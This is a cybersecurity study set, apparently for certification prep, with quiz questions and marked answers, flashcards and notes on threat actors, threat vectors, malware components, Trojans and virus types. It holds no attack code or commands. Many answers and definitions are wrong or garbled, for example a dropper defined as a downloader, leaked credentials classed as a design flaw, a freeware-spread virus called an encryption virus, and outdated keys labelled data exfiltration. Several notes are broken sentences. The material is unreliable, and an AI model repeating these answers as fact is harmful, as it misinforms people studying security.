Understanding Cyber Threats to Organizations

Questions and Answers

Which of the following best describes the primary function of a crypter in the context of malware?

• To conceal the existence of malware. (correct)
• To delete files on a target system.
• To inject the main malware code into other running processes.
• To replicate itself across a network.

Which type of threat actor is most likely to use freely available online tools to attempt network attacks primarily out of curiosity?

• State-sponsored hackers
• Script kiddies (correct)
• Organized hackers
• Industrial spies

Which type of malware is specifically designed to provide a remote attacker with full control over a victim's system?

• Rootkit
• Fileless Malware
• Remote Access Trojan (correct)
• Ransomware

An organization discovers that its customer database has been copied and sold to a competitor. Which threat actor is most likely responsible?

Industrial spy (D)

Which of the following best describes a 'logic bomb' in the context of computer security?

Malicious code triggered by a specific event or time. (D)

An organization's website is defaced with political messages. Which threat actor is most likely responsible?

Hacktivist (B)

Which of the following is a key characteristic that distinguishes a worm from a virus?

A worm spreads more rapidly than a virus. (C)

Which of these scenarios describes the exploitation of a vulnerability through a 'supply chain' threat vector?

An attacker exploits a vulnerability in a third-party vendor's software. (A)

Which type of threat is characterized by natural events that can potentially harm an organization's assets?

Natural threat (D)

Which of the following is the best definition of a threat vector?

A medium through which an attacker gains access to a system. (B)

Which of the following best describes the purpose of a packer in the context of malware?

To compress the malware file to convert the code and data of the malware into an unreadable format. (B)

Which of the following is a common technique used by attackers to distribute malware through the web by embedding malware in ad networks?

Malvertising (D)

What is the primary goal of 'black hat' search engine optimization (SEO) in the context of malware distribution?

To achieve higher search engine rankings for malware pages. (C)

Which of the following is an example of a potential consequence of 'data exfiltration' caused by a vulnerability?

Funds are stolen from customer accounts. (B)

What is a 'sparse infector' virus designed to do in order to avoid antivirus detection?

Infect less often and try to minimize their probability of discovery. (D)

A company discovers that a disgruntled ex-employee used their privileged access to corrupt valuable resources. Which type of threat does this scenario represent?

Internal threat (B)

Which of the following best characterizes a 'direct action' or 'transient' virus?

It infects application files. (B)

Which type of Trojan can modify the HTML content displayed on specific websites targeted by attackers?

Defacement Trojans (C)

A technician discovers that a system's antivirus software is disabled and the default background has changed. Which type of malware infection is indicated by these activities?

Trojan (C)

Which of the following describes the primary characteristic of 'fileless malware'?

It resides primarily in the system's RAM. (B)

What primarily drives organizations to become subject to 'system sprawl/undocumented assets' vulnerabilities?

An increased number of server connections without proper documentation. (A)

An organization’s web server becomes unresponsive due to a flood of traffic originating from numerous compromised systems. Which type of malware is most likely involved?

Botnet (A)

What characteristic of a system's hardware or software is best described as a weakness?

Vulnerability (C)

Which security risk is primarily associated with the failure to change default settings on newly deployed network devices?

Exploitable known vulnerabilities and easy access for attackers (B)

Software vendors provide patches that reduce the probability of threats doing what?

Exploitations (B)

Which of the following is primarily compromised due to lack of end-user awareness?

The network (C)

The risk for an entity that involves connecting to another entity, that later becomes infected by a cybersecurity threat stems from?

Third-Party Risks (B)

Which risk to financial or user information for an entity is caused by obsolete or familiar codes?

Legacy Platform Vulnerabilities (B)

What name is given to private keys that are not stored in a highly secured environment?

Improper Certificate and Key Management (A)

Which one of the following represents a risk that connects to financial or user information compromise?

System Sprawl/Undocumented Assets (A)

While the primary concern when using a device for the first time is usability, what concern should follow usability?

Security (D)

In a situation where computer use is significantly affected due to new browser add-ons being installed, what may be the cause?

Adware (C)

You visit a website and discover that it scans your device's files, and plugins. The system then detects a vulnerability and acts on this. What type of attack is this?

Fileless Propagation Techniques (D)

Which of the following allows legitimate packages in a system in order to run malware in that system?

Native applications. (A)

What is indicated when more resources are required by the system for less output?

A virus. (B)

Why would a hacker employ different ways or variations when carrying out similar activities using an application?

To make it harder to be tracked. (A)

When the system tries to hide from virus programs by actively changing and corrupting the service call, what type of virus behavior is being demonstrated?

Tunelling. (A)

Which stage of cybersecurity is defined as a threat infecting a certain targeted system?

The replication stage. (C)

When users install freeware that secretly monitors settings in your system, what type of application is this?

Potentially Unwanted Application (B)

Which of the following activities represents the most direct realization of a cyber threat?

An attacker successfully exploiting a vulnerability to steal sensitive data. (A)

If a company's server becomes unavailable due to a severe weather event damaging its physical location, this scenario is categorized under which type of threat source?

Natural Threat (C)

What distinguishes structured external threats from unstructured ones in the context of cybersecurity?

Structured threats are carried out by technically skilled attackers, while unstructured threats are not. (D)

In the context of cybersecurity threat actors, what is the primary characteristic that distinguishes a 'hacktivist'?

They aim to promote a political agenda by hacking. (A)

Which characteristic identifies a state-sponsored hacker group from other cyber threat actors?

They're hired by the government to collect classified data and harm systems of other organizations. (D)

What is the key differentiator between a 'black hat' hacker and a 'white hat' hacker?

Black hats use their skills for malicious purposes, while white hats use their skills for defensive purposes. (B)

Which of the following scenarios demonstrates the exploitation of the 'removable media' threat vector?

Malware automatically running from a USB drive plugged into a company computer. (C)

How does a supply chain attack operate as a threat vector to compromise an organization's security?

By exploiting vulnerabilities in third-party vendors and their resources to access the organization's systems. (A)

An attacker injects malicious code into cloud resources to access user information. What kind of attack vector is this?

Cloud (B)

A company finds out that its systems have been infected with Trojans, adware, and fileless malware. What kind of attack vector is this?

Ransomware/malware (C)

Which component of malware hides it from antivirus programs and makes reverse engineering difficult?

Crypter (C)

An employee installs an application from an untrusted website that monitors keyboard input and steals financial information. This is an example of:

Trojan (D)

A program infects a system, modifies the Master Boot Record (MBR), and spreads through email attachments. What type of malware is this?

Multipartite Virus (A)

A file infects MS Word files through Visual Basic for Applications (VBA). What type of virus is this?

Macro Virus (D)

Which type of virus conceals its code by actively altering and corrupting service call interrupts while running?

Stealth/Tunneling Virus (A)

A virus that is made using freeware/shareware, torrents, and fake advertisements is what type of virus?

Encryption Virus (B)

Which malware replicates independently, consumes computing resources, and spreads across network connections?

Worm (C)

What action is a key result from a 'bot herder'?

Creating a network via command-and-control center. (C)

Which characteristic is most indicative of fileless malware?

It depends on the exploitation of RAM. (A)

Why is it challenging to defend against fileless malware compared to traditional malware?

Because it uses already known and safe tools. (C)

When a program is secretly tracking the system's setting without user consent, what type of malware application is this?

Spyware (C)

What type of application floods users with online services when browsing the internet?

Adware (B)

Which of the is an inherent indicator of potential Adware?

Frequent Crash System (D)

How do attackers use keystroke loggers?

To monitor each keystroke. (B)

Which reason explains how risk to security occur?

By looking at the weaknesses (D)

An entity decides not to use IDS or Firewall. What kind of design can result for the entity?

Insecure Design (A)

When there is a failure to apply fixes that target bugs. What technological aspect is being addressed?

Poor patch management (C)

A technician uses simple passwords that can easily be cracked. How those act as a risk?

Default Passwords (A)

What vulnerability is created when there are systems and servers made available, but without proper documentation?

System Sprawl (B)

What is the security risk when there are older versions involved in technology?

Obsolete (D)

When there are outdated keys connected to a key management system, what attack can this be?

Data Exfiltration (B)

Company A has outsourced its data in the cloud without the proper documentation. What type of risk is this?

Vendor Management (C)

What is the implication when there is a system sprawl in place.

There maybe system or server connections that happened without documentation (C)

Which impact refers to potential theft of the personal or financial information?

Identity Theft (A)

Which impact refers to attackers preventing users from accessing websites and resources?

Denial of Service (A)

How is that systems lose revenue?

By having to pay for recover of damages (B)

When there is a breach what causes an entity to be required to sanctions and fines?

Legal Consequences (A)

Which of the following scenarios exemplifies an intentional threat originating from within an organization?

A terminated employee intentionally corrupts critical company data before their access is revoked. (A)

How are 'structured external threats' distinguished from 'unstructured external threats'?

Structured threats use sophisticated tools and techniques; unstructured threats use easily accessible tools with less skill. (B)

What is the primary motivation behind state-sponsored hackers targeting another country's information systems?

To gather intelligence, detect vulnerabilities, and damage systems of other governments or military organizations. (D)

What characteristic differentiates a 'black hat' hacker from a 'gray hat' hacker?

Black hats operate without permission for malicious purposes; gray hats may operate offensively and defensively, sometimes without permission. (C)

How does a 'drive-by download' compromise a user's system?

By exploiting vulnerabilities in browser software when a user visits a compromised website. (B)

Which of the following best describes the function of an 'obfuscator' in malware?

To conceal the malicious code of malware, making it difficult for security mechanisms to detect or remove it. (C)

An employee downloads a program that, along with its stated functionality, secretly installs a keylogger. What type of malware is this application considered?

Trojan (D)

A user notices their computer screen intermittently blinking, inverting colors, and displaying everything backward. Which type of malware infection is suggested by these indicators?

Trojan (C)

A company's security team discovers an application on an employee's computer connecting to a remote server and logging keystrokes. What type of malware is most likely present?

Keylogger (A)

What is the key difference between a virus and a worm in terms of propagation?

Viruses require a host file to propagate; worms can spread independently. (D)

An attacker has successfully created a botnet. How would an attacker leverage this network of infected computers?

To launch a distributed denial-of-service (DDoS) attack. (A)

Which of the following is a primary characteristic that makes fileless malware difficult to detect?

It resides in the system's RAM and infects legitimate software, applications, and processes. (B)

A user is experiencing frequent pop-up ads, redirections to unfamiliar websites, and a new toolbar in their browser that they did not install. What might cause this activity?

Adware infection. (B)

Your computer has been infected with a program displaying unsolicited sales and pop-ups. What type of PUA is it?

Adware (D)

Which of the following best describes a 'zero-day vulnerability'?

A vulnerability that is known to attackers but not yet patched by the software vendor. (A)

Why does failing to change default settings on network devices create a vulnerability?

It makes it easier for attackers to guess the necessary configurations to compromise the system. (A)

An organization neglects to document new systems and server connections. Which kind of vulnerability is likely to arise?

System Sprawl (B)

Leaked database credentials have led to external exploitation of the database. Classify the issue.

Design Flaw (D)

What is the primary risk associated with using unsupported legacy platforms within an organization's infrastructure?

Are caused by obsolete and familiar systems. (B)

Why should private keys used with certificates always be stored in a highly secured environment?

This prevents unauthorized individuals from intercepting the keys and gaining access to confidential data or critical systems. (A)

Flashcards

What is a Threat?

A potential occurrence of an undesirable event that can eventually cause damage or disrupt operations.

Examples of Threats

Stealing sensitive data, causing server shutdowns, tricking employees, or infecting systems with malware.

Natural Threats

Threats from natural events like fires and floods.

Unintentional Threats

Threats from unintentional human errors, negligence, or accidents.

Intentional Threats

Deliberate actions and or insider attacks or external attacks by skilled or unskilled hackers.

Black Hats

Skilled hackers with malicious intent.

White Hats

Ethical hackers using skills for defensive purposes.

Gray Hats

Hackers working both offensively and defensively.

Suicide Hackers

Hackers bringing down critical infrastructure for a cause.

Script Kiddies

Unskilled hackers using premade scripts and tools.

Cyber Terrorists

Individuals seeking disruption of computer networks via religious or political motivations.

State-Sponsored Hackers

Government-employed hackers for espionage and system damage.

Hacktivist

Individuals promoting a political agenda through hacking.

Hacker Teams

Collaborative skilled hackers with resources and funding dedicated to advanced research and coordinated attacks.

Industrial Spies

Individuals performing corporate espionage for competitive advantage.

Insider

Trusted individuals misusing critical access within an organization.

Criminal Syndicates

Organized groups involved in planned criminal schemes planned to embezzele money.

Organized Hackers

Criminals renting botnets to pilfer money through cyber-attacks.

Threat Vector

The medium that an attacker gains access to a system through.

Direct access

Gaining physical access to perform malicious activities.

Removable media

Using USBs to spread malware, steal, or corrupt files.

Wireless

Compromising unsecured wireless connections and networks.

Email

Using phishing emails with malicious attachments for system compromise.

Cloud

Malware injected to control cloud resources and user data.

Ransomware/malware

Using unpatched vulnerabilities to inject ransomware and malware.

Supply chain

Compromising vulnerabilities within a third-party supply chain.

Business partners

Attacking through business partnerships and third party organizations.

What is Malware?

Malicious software damaging computer systems and giving creators control.

Malware System Entry

Instant messengers, removable devices and email attachments.

Crypter

A program that conceals the existence of malware.

Downloader

A type of Trojan that downloads other malware from the Internet.

Dropper

A type of malware that downloads other malware from the Internet.

Exploit

Code that takes advantage of a vulnerability to breach system security.

Injector

Program injecting malicious code into other running processes.

Obfuscator

Program concealing malicious code of malware.

Packer

Software compressing malware file to mask its contents.

Payload

Part of malware performing the desired malicious activity.

Malicious Code

The actual code causing security breaches in malware.

What is a Trojan?

A program disguised as harmless, used to gain control and steal data.

Remote Access Trojans

Remote Access Trojans (RATs) provide attackers with full control over the victim's system.

Backdoor Trojans

Bypasses authentication/firewalls, and gives hackers backdoor access to your computer.

Botnet Trojans

Tricks users into trojans downloading and creates a network of controllled bots.

Rootkit Trojans

Potent backdoors grant root/admin-level access system, by observings services. Rootkits cannot be spotted and provide full full control

E-banking Trojans

These intercept victim data and are dangerous.

Point-of-Sale Trojans

Targets systems to steals credit.

Defacement Trojans

Destroys entire system, or website contents.

Service Protocol Trojans

Performs attack through VNC, DNS protocols.

Mobile Trojans

Malicious codes that makes and targets mobile phones.

Security Software D

Software that targets to stop securities programs from workings.

What is a Virus?

A malicious programs that can copy itself and infect PC.

Virus Characteristic

Infections, transforming itself and encryption.

Study Notes

Threats

• A threat refers to something that can cause damage and disrupt operational activities of an organization.
• Attackers use threats to infiltrate and steal data, such as personal info, financial info, and login credentials.

Examples of Threats

• An attacker stealing sensitive data.
• An attacker causing a server to shut down.
• An attacker tricking an employee into revealing sensitive information.
• An attacker infecting a system with malware.
• An attacker spoofing the identity of an authorized person to gain access.
• An attacker modifying or tampering with data transferred over a network.
• An attacker remotely altering data in a database server.
• An attacker performing URL redirection or forwarding.
• An attacker performing privilege escalation for unauthorized access.
• An attacker executing a denial-of-service (DoS) attack for making resources unavailable.
• An attacker eavesdropping on a communication channel without authorization.

Threat Sources

• Threats can be classified into natural, unintentional, and intentional
• Natural threats include fires, floods and power failures and have the potential to cause physical damage to computer systems
• Unintentional threats originate from insider security breaches, negligence, operator errors, unskilled administrators, or untrained employees
• Intentional threats include insiders or internal attacks performed by disgruntled or negligent employees that intentionally/unintentionally harm the organization.
• Most computer and internet related crimes are internal attacks performed by individuals within the organization
• External attacks exploit vulnerabilities already present in a network, and the potential severity is dependent on identified network weaknesses
• Structured external threats are implemented by technically skilled attackers who use tools to gain access into a network with the intention of disrupting services
• The motivation behind structured attacks can vary but includes criminal bribes, racism, politics, and terrorism
• Structured external threats include examples like distributed ICMP floods, spoofing and simultaneously executing attacks from multiple sources
• Unstructured external threats are performed by unskilled attackers, aspiring hackers, and are typically based on curiosity rather than criminal intent.
• Unstructured external attacks can be easily prevented with port scanning and address sweeping security solutions
• An example is using freely available online tools to attack a network or crash a website

Threat Actors/Agents

• Black hats use their extraordinary computing skills for illegal/malicious purposes, often engaging in criminal activities, and are also know as crackers.
• White hats (penetration testers) use their hacking skills for defensive purposes with permission from the system owner, such as security analysts knowledgeable about countermeasures.
• Gray hats work both offensively and defensively at various times, helping hackers find vulnerabilities while assisting vendors to improve products (software/hardware).
• Suicide hackers aim to bring down critical infrastructure for a cause and are unconcerned about facing jail terms or other punishment.
• Script kiddies are unskilled hackers using scripts, tools, and software developed by real hackers, focusing on the quantity of attacks instead of quality.
• Cyber terrorists with religious or political motivations aim to create fear through large-scale disruption of computer networks
• State-sponsored hackers, employed by governments, seek to penetrate systems, gain top-secret information, and damage other governments.
• Industrial spies perform corporate espionage to steal critical information like blueprints and formulas, often using advanced persistent threats (APTs) and social engineering.
• Insiders are employees (trusted persons) with critical asset access who use their privileges to violate rules or harm the organization's systems, often due to disgruntled or terminated status.
• Hacker teams are skilled hackers with resources and funding working together to research state-of-the-art technologies
• Criminal Syndicates are part of organized and prolonged criminal activities that exploit victims from distinct jurisdictions' to embezzle money through cyber attacks.
• Hackivists hack into government or corporate computer systems as a form of activism.
• Organized hackers are groups of hackers that work together in criminal activities that sell the information to the highest bidder.

Attributes of Threat Actors

• Internal actors are trusted insiders with authorized access to resources.
• External actors are outsiders with no authorized access but physical resources.
• Highly sophisticated threat actors are more successful than less sophisticated ones.
• Resources/funding determines how a threat actor supports an attack financially or with tools.
• Intent/motivation of threat actors can be connected to political/personal goals, making them more likely to launch an attack.

Threat Vectors

• Direct access is where the attacker gains physical access to the target system and performs malicious activities.
• Removable Media is where devices such as USB drives, phones, and printers become a way for malware to run automatically on the system.
• Wireless is where corporate devices can be comprised through unsecured wirless hotspots and/or credentials being stolen.
• Email sends phishing attacks containing malicious attachments that allow attackers to compromise their targets.
• Cloud contains injected malware into cloud resources to gain access to user information.
• Ransomware/Malware takes advantage of unpatched vulnerabilities as well as malware to infiltrate an organization.
• Supply chain attempts to compromise the target by exploiting vulnerabilities in the resources supplies by 3rd party vendors
• Business partners are third-party organizations that emerge as a threat vector.

Autorun.inf Mitigation

• Autorun.inf is a file that when executed, runs executables listed in the file and displays the file.
• To mitigate the autorun.inf threat, the Autostart functionality should be turned off.

Common Malware Distribution Techniques

• Black hat SEO ranks malware highly in search results.
• Social Engineered Click-jacking tricks users into clicking on innocent looking webpages.
• Spear-phishing mimics legitimate institutions in an attempt to steal login credentials.
• Malvertising embeds malware in ad networks to displays across hundreds of legitimate, high-traffic sites
• Compromised legitimate websites host embedded malware that spreads to unsuspecting visitors.
• Drive-by-downloads uses browser flaws to install malware just by visiting a webpage.
• Spam emails attaches the malware to emails and tricks victims to click the attachment.

General Malware Components

• Crypters conceal the existence of malware.
• Downloaders used by trojans download malicious code
• Droppers are covert carriers to embed malware files in order to perform an installation task
• Exploits contain commands to take advantage of bugs/vulnerabilities, breaking security through software vulnerabilities. Local (inside network) and remote (outside network) exploits
• Injectors inject malicious code into code into vulnerable running processes and changes methods
• Obfuscators conceals malicious code via various techniques for difficulty.
• Packers compress the malware file by compressing into unreadable format.
• Payloads perform the desired activity once activated that may modify or delete files, open ports etc.
• Malicious code defines the basic functionality of malware. Can take various forms Java Applets, ActiveX Controls, Browser Plug-ins and Pushed Content

Trojan Indications

• The DVD ROM drawer opens and closes automatically.
• The compute screen blinking, flips upside down, or is inverted so that everything is displayed backward.
• Printers automatically start printing documents
• A web page suddenly opening without input from the user
• The color settings of the operating system changes automatically.
• Screensavers convert to a personal scrolling message/advertisements.
• The sound volume suddenly fluctuates
• Date and time of the computer changes.
• Mouse courser moves by itself.
• The left-and right-click functions of the mouse are interchanged.
• The mouse pointer disappears compeltely.
• The mouse pointer automatically clicks on icons and is uncontrollable.
• The Windows start button disappears.
• Pop-ups with bizarre messages appear unexpectedly.
• Clipboard images/text appearing to be manipulated.
• The keyboard and mouse freeze.
• Contacts receive emails that the user did not send.
• Strange warnings or question boxes appear.
• System turns off and restarts in unusual way.
• The taskbar disappears automatically due to a Trojan.
• The Task manager is disabled by a Trojan.
• Antivirus programs are automatically disabled and corrupted/altered/deleted from the systems data.

Types of Trojans

• Remote Access Trojans (RATs) give attackers full control of the victim's system to remotely access files and private conversations.
• Backdoor Trojans are programs that bypass standard authentication mechanisms to leverage backdoor programs in order to access the victim's computer without detection, as it is performed without the user's knowledge.
• Botnet Trojans are leveraged to infect a large amount of computers to create bot herders that can command said botnets to be used for attacks on targets.
• Rootkit Trojans are designed to get admin level access to a system that's difficult to detect by observing services, system task lists, or registries.
• E-banking trojans intercept account information before the system an encrypt it and send it to the attack command-and-control.

Trojan Uses

• Deeting critical operating system files.
• Disabling firewalls and antivirus.
• Create backdoors to gain remote access
• Use a victim's pc for spamming.
• Steal personal information such as security codes and passwords.
• Download spyware, adware, malware.
• Encrypt and lock out victims from accessing the system.

Types of Viruses

• System or Boot Sector infects system sectors including the master boot record (MBR) and the DOS boot record system sectors
• Email attachments and removable media (USB drives) are the primary carriers
• File Viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files
• inserts their code into the original file and infect executable files
• Multipartite Virus (hybrid virus) combines the approach of file infectors and boot record infectors, simultaneously attacking both the boot sector and the executable or program files.
• Macro viruses infect Microsoft Word and similar applications, written in the macro language Visual Basic
• Cluster clusters infect files without changing the file or planting additional files
• Stealth/Tunneling alter and corrupts corrupting services to hide from anti-virus programs